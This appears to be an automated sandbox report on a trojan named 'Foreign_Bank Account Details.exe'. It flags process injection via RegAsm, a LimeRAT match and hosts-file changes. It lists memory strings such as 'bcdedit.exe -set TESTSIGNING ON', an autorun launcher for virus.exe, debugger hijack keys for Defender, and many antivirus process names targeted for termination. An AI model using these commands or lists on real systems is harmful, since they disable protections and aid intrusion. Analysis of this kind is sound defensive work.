Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: d!#slf:aggr:copyrenamed!msxsl.exe
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: !#slf:aggr:copyrenamed!netsh.exe
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: d!#slf:aggr:copyrenamed!netsh.exe
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: !#slf:aggr:copyrenamed!notes.exe
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: d!#slf:aggr:copyrenamed!notes.exe
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: !#slf:aggr:copyrenamed!print.exe
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: d!#slf:aggr:copyrenamed!print.exe
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: !#slf:aggr:copyrenamed!vmmap.exe
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: d!#slf:aggr:copyrenamed!vmmap.exe
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: !#alf:trojan:win32/obfuse.xsxg!lnk
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: "b!#alf:trojan:win32/obfuse.xsxg!lnk
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: !#alf:exploit:script/makeshift.a!dha
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: $`!#alf:exploit:script/makeshift.a!dha
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: !#alf:trojanspy:msil/formbook.rbf!mtb
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: %_!#alf:trojanspy:msil/formbook.rbf!mtb
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: !#script:adware:html/seoframe.a!lowfi
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: %_!#script:adware:html/seoframe.a!lowfi
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: !#alf:trojan:win32/cassini_2b8f5083!ibt
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: ']!#alf:trojan:win32/cassini_2b8f5083!ibt
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: !#slf:aggr:suspamsiwmieventsubsription.b
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: (\!#slf:aggr:suspamsiwmieventsubsription.b
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: !#slf:trojan:powershell/amsiscanbypass.c
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: (\!#slf:trojan:powershell/amsiscanbypass.c
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: !#slf:hacktool:powershell/internaloff.c1!mtb
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: ,x!#slf:hacktool:powershell/internaloff.c1!mtb
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: -w!#blkacc:d4f940ab-401b-4efc-aadc-ad5f3c50688a
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: !#tel:trojan:o97m/excelobjectxllpluginabuse.b
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: -w!#tel:trojan:o97m/excelobjectxllpluginabuse.b
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: !#alf:aggr:siga:msil/suspicious.send.screencap.s1
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: 1s!#alf:aggr:siga:msil/suspicious.send.screencap.s1
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: !#agg:nivdort.cq1
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: t!#agg:nivdort.cq1
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: !#slf:suspfileinwinmail.j!ibt
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: h!#slf:suspfileinwinmail.j!ibt
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: !#alf:nullsoft:windowsdiscount
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: g!#alf:nullsoft:windowsdiscount
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: !#aggr:trojan:msil/injgen.j!ibt
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: f!#aggr:trojan:msil/injgen.j!ibt
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: e!#alf:trojan:win32/cassini.a!ibt
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: !#lowfitrojan:js/seedabutor.c_02
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: e!#lowfitrojan:js/seedabutor.c_02
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: !#aggr:js/faceliker!eventlistener
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: !d!#aggr:js/faceliker!eventlistener
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: !#alf:powershell/bypassamsi.a!mtb
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: !d!#alf:powershell/bypassamsi.a!mtb
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: !#alf:trojan:html/fakealert.ar!mtb
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: "c!#alf:trojan:html/fakealert.ar!mtb
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: !#alf:trojanspy:vbs/mekotio.mk!mtb
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: "c!#alf:trojanspy:vbs/mekotio.mk!mtb
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: !#slf:trojanclicker:js/faceliker_6
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: "c!#slf:trojanclicker:js/faceliker_6
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: !#slf:trojanclicker:js/faceliker_7
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: "c!#slf:trojanclicker:js/faceliker_7
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: #b!#alf:backdoor:js/potentialwebshell
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: !#alf:trojan:win32/cassini_56a3061!ibt
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: &_!#alf:trojan:win32/cassini_56a3061!ibt
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: !#scpt:trojandownloader:vbs/adodb!owse
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: &_!#scpt:trojandownloader:vbs/adodb!owse
Source: MpSigStub.exe, 00000023.00000003.18292748067.0000015B1BAC0000.00000004.00000001.sdmp Binary or memory string: !#tel:exploit:o97m/ddedownloader.v!mtb
Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\Desktop\Foreign_Bank Account Details.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe 'C:\Users\user\Desktop\Foreign_Bank Account Details.exe' Jump to behavior
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\MpSigStub.exe Code function: 42_2_00007FF650D4E0C4 AllocateAndInitializeSid,FreeSid, 42_2_00007FF650D4E0C4
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\MpSigStub.exe Code function: 42_2_00007FF650D4F884 GetCurrentProcess,GetLengthSid,InitializeSecurityDescriptor,InitializeAcl,AddAccessAllowedAce,AddAccessAllowedAce,AddAccessAllowedAce,AddAccessAllowedAce,SetSecurityDescriptorDacl,GetLastError,CloseHandle,SetLastError, 42_2_00007FF650D4F884
Source: MpSigStub.exe, 00000023.00000003.18349339011.0000015B1A999000.00000004.00000001.sdmp Binary or memory string: MSVBVM60MSVBVM50MSVBVM events are artifactsRICHEDIT50Wmyself.dll%08x0x%xException in the timer procC:\Wallpaper1.bmp2 :|:1 11EditButtonVDLL:HMValidateHandleCalledC:\C:\WinSta0SkypeControlAPISkypeControlAPIAttachSkypeControlAPIDiscoverGDI32.DLLArmadillo_MutexGDI32.DLLChildControlStaticListBoxScrollBarComboBox#32770DialogPEEMU:VirTool:Win32/Obfuscator_Upatreriched20.dllRichEditANSIWndProcRichEditMDICLIENTMDICLIENTlistboxWINSTA0WinSta0Winsta0Winsta000000409CursorInternet Explorer_ServerTibiaClientTibia#32769ATL:007BF380YTopWindowYahooBuddyMainYahoo! MessengerWMPlayerAppPlaying MP3NotepadMy saved passwords - NotepadProgram ManagerShell_TrayWndtooltips_class32CityBank log-inIEFrameBank of America log-infalsetrue_Dummy_0x6A__Dummy_0x69__Dummy_0x68__Dummy_0x67__Dummy_0x66__Dummy_0x65__Dummy_0x64__Dummy_0x63__Dummy_0x62__Dummy_0x61__Dummy_0x60__Dummy_0x5F__Dummy_0x5E__Dummy_0x5D__Dummy_0x5C__Dummy_0x5B__Dummy_0x5A__Dummy_0x59__Dummy_0x58__Dummy_0x57__Dummy_0x56__Dummy_0x55__Dummy_0x54__Dummy_0x53__Dummy_0x52__Dummy_0x51__Dummy_0x50__Dummy_0x4F__Dummy_0x4E__Dummy_0x4D__Dummy_0x4C__Dummy_0x4B__Dummy_0x4A__Dummy_0x49__Dummy_0x48__Dummy_0x47__Dummy_0x46__Dummy_0x45__Dummy_0x44__Dummy_0x43__Dummy_0x42__Dummy_0x41__Dummy_0x40__Dummy_0x3F__Dummy_0x3E__Dummy_0x3D__Dummy_0x3C__Dummy_0x3B__Dummy_0x3A__Dummy_0x39__Dummy_0x38__Dummy_0x37__Dummy_0x36__DummyAA__DummyZ__DummyW__DummyV__DummyU__DummyT__DummyS__DummyR__DummyQ__DummyP__DummyO__DummyN__DummyM__DummyL__DummyK__DummyJ__DummyI__DummyH__DummyG__DummyF__DummyE__DummyD__DummyC__DummyB__DummyA__Dummy9__Dummy_x1c__Dummy7__Dummy6__Dummy5__Dummy4__Dummy3__Dummy2__Dummy_
Source: MpSigStub.exe, 00000023.00000003.18293985930.0000015B1C0F1000.00000004.00000001.sdmp Binary or memory string: C:\WINDOWS\SYSTEM32\progman.exeexe D
Source: RegAsm.exe, 00000008.00000002.21892235847.0000000001BA1000.00000002.00020000.sdmp, MpSigStub.exe, 00000023.00000003.18349339011.0000015B1A999000.00000004.00000001.sdmp Binary or memory string: Program Manager
Source: RegAsm.exe, 00000008.00000002.21892235847.0000000001BA1000.00000002.00020000.sdmp, MpSigStub.exe, 00000023.00000003.18349339011.0000015B1A999000.00000004.00000001.sdmp Binary or memory string: Shell_TrayWnd
Source: MpSigStub.exe, 00000023.00000003.18288248948.0000015B1B1FB000.00000004.00000001.sdmp Binary or memory string: GetProgmanWindow
Source: RegAsm.exe, 00000008.00000002.21892235847.0000000001BA1000.00000002.00020000.sdmp Binary or memory string: Progman
Source: MpSigStub.exe, 00000023.00000003.18309335590.0000015B1AFA8000.00000004.00000001.sdmp Binary or memory string: %s\Rundll32.exe "%s\%s",DllCanUnloadNowShell_TrayWndSoftware\
Source: MpSigStub.exe, 00000023.00000003.18344332390.0000015B1C1B7000.00000004.00000001.sdmp Binary or memory string: Shell_TrayWndx
Source: MpSigStub.exe, 00000023.00000003.18426889733.0000015B1BBC7000.00000004.00000001.sdmp Binary or memory string: ~SystemCache.batShell_TrayWnd
Source: MpSigStub.exe, 00000023.00000003.18322243559.0000015B1A504000.00000004.00000001.sdmp Binary or memory string: \Internet Explorer\Quick Launch\Shell_TrayWnd
Source: MpSigStub.exe, 00000023.00000003.18309645507.0000015B1A404000.00000004.00000001.sdmp Binary or memory string: Progman Folder*Administrative Tools
Source: MpSigStub.exe, 00000023.00000003.18334520035.0000015B1A6C6000.00000004.00000001.sdmp Binary or memory string: shell_traywnd%s\C:\WINDOWS\Sy
Source: MpSigStub.exe, 00000023.00000003.18431115827.0000015B1AFEA000.00000004.00000001.sdmp Binary or memory string: Explorer.exeShell_TrayWndGetProc
Source: MpSigStub.exe, 00000023.00000003.18334520035.0000015B1A6C6000.00000004.00000001.sdmp Binary or memory string: shell_traywnd
Source: MpSigStub.exe, 00000023.00000003.18288248948.0000015B1B1FB000.00000004.00000001.sdmp Binary or memory string: SetProgmanWindow
Source: MpSigStub.exe, 00000023.00000003.18289622866.0000015B1BD96000.00000004.00000001.sdmp Binary or memory string: shell_traywnd

Language, Device and Operating System Detection:

barindex
Queries the volume information (name, serial number etc) of a device
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe VolumeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\tKZVPq\tKZVPq.exe Queries volume information: C:\Users\user\AppData\Roaming\tKZVPq\tKZVPq.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\tKZVPq\tKZVPq.exe Queries volume information: C:\Users\user\AppData\Roaming\tKZVPq\tKZVPq.exe VolumeInformation Jump to behavior
Contains functionality to query CPU information (cpuid)
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\MpSigStub.exe Code function: 42_2_00007FF650D4418C cpuid 42_2_00007FF650D4418C
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\MpSigStub.exe Code function: 42_2_00007FF650CFF3E8 GetCurrentProcessId,GetCurrentProcessId,CreateNamedPipeW,GetCurrentProcessId, 42_2_00007FF650CFF3E8
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\85F3688C-80F4-4AE9-A600-CCB6F7611E7D\MpSigStub.exe Code function: 42_2_00007FF650D4D78C RtlGetVersion,RtlNtStatusToDosError,SetLastError,GetLastError, 42_2_00007FF650D4D78C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior
Source: C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\mpam-c45e5da5.exe Code function: 34_2_00007FF758858ED4 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter, 34_2_00007FF758858ED4

Lowering of HIPS / PFW / Operating System Security Settings:

barindex
Yara detected LimeRAT
Source: Yara match File source: 00000023.00000003.18430467796.0000015B1AE1C000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000003.18431461093.0000015B1B02B000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: MpSigStub.exe PID: 3992, type: MEMORYSTR
May enable test signing (to load unsigned drivers)
Source: MpSigStub.exe, 00000023.00000003.18284212320.0000015B1B935000.00000004.00000001.sdmp Memory string: bcdedit.exe -set TESTSIGNING ON
Source: MpSigStub.exe, 00000023.00000003.18286860697.0000015B081A5000.00000004.00000001.sdmp Memory string: bcdedit.exe -set TESTSIGNING ON
Modifies the hosts file
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File written: C:\Windows\System32\drivers\etc\hosts Jump to behavior
May initialize a security null descriptor
Source: MpSigStub.exe, 00000023.00000003.18427196191.0000015B1AB46000.00000004.00000001.sdmp Binary or memory string: S:(ML;;NRNWNX;;;LW)]
AV process strings found (often used to terminate AV products)
Source: MpSigStub.exe, 00000023.00000003.18293985930.0000015B1C0F1000.00000004.00000001.sdmp Binary or memory string: \avgupd.exe
Source: MpSigStub.exe, 00000023.00000003.18346827221.0000015B1B1B9000.00000004.00000001.sdmp Binary or memory string: scanwscs.exe
Source: MpSigStub.exe, 00000023.00000003.18309645507.0000015B1A404000.00000004.00000001.sdmp Binary or memory string: Bsoftware\microsoft\windows\currentversion\app paths\wireshark.exe
Source: MpSigStub.exe, 00000023.00000003.18345359888.0000015B1A789000.00000004.00000001.sdmp Binary or memory string: procmon.exe
Source: MpSigStub.exe, 00000023.00000003.18338690411.0000015B1A7CB000.00000004.00000001.sdmp Binary or memory string: tcpview.exe
Source: MpSigStub.exe, 00000023.00000003.18424133495.0000015B1C0F0000.00000004.00000001.sdmp Binary or memory string: \startup\360tray.exe
Source: MpSigStub.exe, 00000023.00000003.18346827221.0000015B1B1B9000.00000004.00000001.sdmp Binary or memory string: fsgk32.exe
Source: MpSigStub.exe, 00000023.00000003.18346827221.0000015B1B1B9000.00000004.00000001.sdmp Binary or memory string: bullguard.exe
Source: MpSigStub.exe, 00000023.00000003.18424566697.0000015B1C41E000.00000004.00000001.sdmp Binary or memory string: kav32.exe
Source: MpSigStub.exe, 00000023.00000003.18426595439.0000015B1BB86000.00000004.00000001.sdmp Binary or memory string: sched.exe
Source: MpSigStub.exe, 00000023.00000003.18289945062.0000015B1AE5F000.00000004.00000001.sdmp Binary or memory string: fsm32.exe
Source: MpSigStub.exe, 00000023.00000003.18433465792.0000015B1B723000.00000004.00000001.sdmp Binary or memory string: ravmond.exe
Source: MpSigStub.exe, 00000023.00000003.18289945062.0000015B1AE5F000.00000004.00000001.sdmp Binary or memory string: fsav32.exe
Source: MpSigStub.exe, 00000023.00000003.18337818328.0000015B1BB10000.00000004.00000001.sdmp Binary or memory string: hijackthis.exe
Source: MpSigStub.exe, 00000023.00000003.18317322207.0000015B1B5DB000.00000004.00000001.sdmp Binary or memory string: \windows defender\msascui.exe
Source: MpSigStub.exe, 00000023.00000003.18320914162.0000015B1B65F000.00000004.00000001.sdmp Binary or memory string: \msmpeng.exe
Source: MpSigStub.exe, 00000023.00000003.18343611807.0000015B1BD13000.00000004.00000001.sdmp Binary or memory string: FSMA32.EXE
Source: MpSigStub.exe, 00000023.00000003.18311861284.0000015B1C02A000.00000004.00000001.sdmp Binary or memory string: [HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msascui.exe
Source: MpSigStub.exe, 00000023.00000003.18431805767.0000015B1BFA6000.00000004.00000001.sdmp Binary or memory string: kavsvc.exe
Source: MpSigStub.exe, 00000023.00000003.18289945062.0000015B1AE5F000.00000004.00000001.sdmp Binary or memory string: fsbl.exe
Source: MpSigStub.exe, 00000023.00000003.18338690411.0000015B1A7CB000.00000004.00000001.sdmp Binary or memory string: procdump.exe
Source: MpSigStub.exe, 00000023.00000003.18346827221.0000015B1B1B9000.00000004.00000001.sdmp Binary or memory string: fpavserver.exe
Source: MpSigStub.exe, 00000023.00000003.18424133495.0000015B1C0F0000.00000004.00000001.sdmp Binary or memory string: \360tray.exe
Source: MpSigStub.exe, 00000023.00000003.18299514362.0000015B1AF02000.00000004.00000001.sdmp Binary or memory string: kxetray.exe
Source: MpSigStub.exe, 00000023.00000003.18349339011.0000015B1A999000.00000004.00000001.sdmp Binary or memory string: \virus.exe
Source: MpSigStub.exe, 00000023.00000003.18290355074.0000015B1AEB4000.00000004.00000001.sdmp Binary or memory string: wireshark.exe
Source: MpSigStub.exe, 00000023.00000003.18424133495.0000015B1C0F0000.00000004.00000001.sdmp Binary or memory string: KAVPFW.EXE
Source: MpSigStub.exe, 00000023.00000003.18426595439.0000015B1BB86000.00000004.00000001.sdmp Binary or memory string: ESET\nod32.exe
Source: MpSigStub.exe, 00000023.00000003.18431805767.0000015B1BFA6000.00000004.00000001.sdmp Binary or memory string: pctsGui.exe
Source: MpSigStub.exe, 00000023.00000003.18346827221.0000015B1B1B9000.00000004.00000001.sdmp Binary or memory string: sbamtray.exe
Source: MpSigStub.exe, 00000023.00000003.18424566697.0000015B1C41E000.00000004.00000001.sdmp Binary or memory string: 360tray.exe
Source: MpSigStub.exe, 00000023.00000003.18349339011.0000015B1A999000.00000004.00000001.sdmp Binary or memory string: torun.infshell\open\command=virus.exe[AutoRun]\virus.exe
Source: MpSigStub.exe, 00000023.00000003.18427547415.0000015B1B8F2000.00000004.00000001.sdmp Binary or memory string: kpfwsvc.exe
Source: MpSigStub.exe, 00000023.00000003.18424989390.0000015B1C5AA000.00000004.00000001.sdmp Binary or memory string: 360Tray.exe
Source: MpSigStub.exe, 00000023.00000003.18346827221.0000015B1B1B9000.00000004.00000001.sdmp Binary or memory string: superantispyware.exe
Source: MpSigStub.exe, 00000023.00000003.18343611807.0000015B1BD13000.00000004.00000001.sdmp Binary or memory string: mcvsshld.exe
Source: MpSigStub.exe, 00000023.00000003.18431805767.0000015B1BFA6000.00000004.00000001.sdmp Binary or memory string: RavmonD.exe
Source: MpSigStub.exe, 00000023.00000003.18311861284.0000015B1C02A000.00000004.00000001.sdmp Binary or memory string: [HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msmpeng.exe
Source: MpSigStub.exe, 00000023.00000003.18315624417.0000015B1B02C000.00000004.00000001.sdmp Binary or memory string: \windows defender\msmpeng.exe
Source: MpSigStub.exe, 00000023.00000003.18346827221.0000015B1B1B9000.00000004.00000001.sdmp Binary or memory string: op_mon.exe
Source: MpSigStub.exe, 00000023.00000003.18346827221.0000015B1B1B9000.00000004.00000001.sdmp Binary or memory string: k7emlpxy.exe
Source: MpSigStub.exe, 00000023.00000003.18427547415.0000015B1B8F2000.00000004.00000001.sdmp Binary or memory string: CCenter.exe
Source: MpSigStub.exe, 00000023.00000003.18311861284.0000015B1C02A000.00000004.00000001.sdmp Binary or memory string: HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msmpeng.exe
Source: MpSigStub.exe, 00000023.00000003.18427547415.0000015B1B8F2000.00000004.00000001.sdmp Binary or memory string: KWatch.exe
Source: MpSigStub.exe, 00000023.00000003.18346827221.0000015B1B1B9000.00000004.00000001.sdmp Binary or memory string: quhlpsvc.exe
Source: MpSigStub.exe, 00000023.00000003.18432136853.0000015B1BFE7000.00000004.00000001.sdmp Binary or memory string: KvXP.kxp
Source: MpSigStub.exe, 00000023.00000003.18427547415.0000015B1B8F2000.00000004.00000001.sdmp Binary or memory string: kpfw32.exe
Source: MpSigStub.exe, 00000023.00000003.18289945062.0000015B1AE5F000.00000004.00000001.sdmp Binary or memory string: msmpeng.exe
Source: MpSigStub.exe, 00000023.00000003.18427841372.0000015B1B933000.00000004.00000001.sdmp Binary or memory string: 360TraY.exe
Source: MpSigStub.exe, 00000023.00000003.18346827221.0000015B1B1B9000.00000004.00000001.sdmp Binary or memory string: k7pssrvc.exe
Source: MpSigStub.exe, 00000023.00000003.18434111043.0000015B1AF23000.00000004.00000001.sdmp Binary or memory string: tmproxy.exe
Source: MpSigStub.exe, 00000023.00000003.18295774211.0000015B1BEE1000.00000004.00000001.sdmp Binary or memory string: *.csv.|!\SBAMSvc.exe
Source: MpSigStub.exe, 00000023.00000003.18346827221.0000015B1B1B9000.00000004.00000001.sdmp Binary or memory string: k7tsmngr.exe
Source: MpSigStub.exe, 00000023.00000003.18346827221.0000015B1B1B9000.00000004.00000001.sdmp Binary or memory string: emlproxy.exe
Source: MpSigStub.exe, 00000023.00000003.18424566697.0000015B1C41E000.00000004.00000001.sdmp Binary or memory string: nod32.exe
Source: MpSigStub.exe, 00000023.00000003.18329979252.0000015B1AE1C000.00000004.00000001.sdmp Binary or memory string: kav.exe
Source: MpSigStub.exe, 00000023.00000003.18427547415.0000015B1B8F2000.00000004.00000001.sdmp Binary or memory string: kvsrvxp.exe
Source: MpSigStub.exe, 00000023.00000003.18425422653.0000015B1C5EB000.00000004.00000001.sdmp Binary or memory string: \360safe.exe
Source: MpSigStub.exe, 00000023.00000003.18346827221.0000015B1B1B9000.00000004.00000001.sdmp Binary or memory string: fprottray.exe
Source: MpSigStub.exe, 00000023.00000003.18346827221.0000015B1B1B9000.00000004.00000001.sdmp Binary or memory string: clamtray.exe
Source: MpSigStub.exe, 00000023.00000003.18294597236.0000015B1A5CB000.00000004.00000001.sdmp Binary or memory string: savservice.exe
Source: MpSigStub.exe, 00000023.00000003.18424566697.0000015B1C41E000.00000004.00000001.sdmp Binary or memory string: nod32krn.exe
Source: MpSigStub.exe, 00000023.00000003.18296662261.0000015B1C292000.00000004.00000001.sdmp Binary or memory string: avgupd.exe
Source: MpSigStub.exe, 00000023.00000003.18346827221.0000015B1B1B9000.00000004.00000001.sdmp Binary or memory string: guardxservice.exe
Source: MpSigStub.exe, 00000023.00000003.18427547415.0000015B1B8F2000.00000004.00000001.sdmp Binary or memory string: DefWatch.exe
Source: MpSigStub.exe, 00000023.00000003.18345359888.0000015B1A789000.00000004.00000001.sdmp Binary or memory string: regshot.exe
Source: MpSigStub.exe, 00000023.00000003.18424133495.0000015B1C0F0000.00000004.00000001.sdmp Binary or memory string: bdagent.exe
Source: MpSigStub.exe, 00000023.00000003.18424989390.0000015B1C5AA000.00000004.00000001.sdmp Binary or memory string: kavstart.exe
